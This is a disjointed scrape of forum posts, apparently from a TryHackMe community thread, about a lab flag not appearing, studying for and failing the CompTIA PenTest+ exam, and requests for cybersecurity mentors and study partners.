i did the task but the flag does not seem to show up
I would say PenTest+ is a ways off for you if you have not done the A+ or Network+ stuff yet. I have been going at this for about a year and just failed my PenTest+, so for me this has been the only one I have had an issue with, and I am back to square one on this.
During your test, what were you questioned on? My current studies and knowledge are based around both and ethical hacking, but I would want to try and get a physical certificate.
It's bugged. Please restart both the attack and target machine and give it another go; the flag should pop up. If it doesn't, go ahead and refresh. Let me know how it goes; I'm pretty sure I experienced the same issue.
You can go to the CompTIA site and they will have a list of all the objectives covered and what percentage of the test will pertain to what domain. I will tell you the CompTIA CertMaster did not help me much at all. The test was at a much higher level than what was covered. Also I had 6 PBQs, but I didn't think they were super difficult (of course I failed, so take that for what it is worth). If I were you I would know the tools, the types of attacks (what tool for what scenario), and then look at different outputs from the tools and the scripts. I think that is where I missed the majority. There were some script/code questions that I know I missed.
I agree, without the foundational knowledge or experience under your belt, you will not be able to pass Pentest+, you'll have to do some serious studying. The THM Pentest+ Path is definitely a great way to learn a lot.
Pls, I am looking for a cyber security mentor; I am in need of someone to work with and help me while I grow.
i just started my journey
Good luck on your cyber journey 🙂 🚀
thanks
lets be partners
the world's best motivator
Hello everyone, well, this is just something I want to do actually. So basically I want to have a group of both newbies and experienced people in the world of cybersecurity, mainly red teaming and penetration testing, so we can all learn together and build ourselves. I know some might have some contradictory opinions, but it's just what I think works. So, anyone interested?
"ntlmauth.za.tryhackme.com" doesn't appear to exist anymore, is it still possible to complete Breaching Active Directory?
sounds cool, I'm interested
Tips?